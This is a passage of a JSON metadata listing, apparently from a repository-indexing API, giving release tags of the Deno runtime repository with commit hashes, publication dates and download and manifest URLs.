ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8"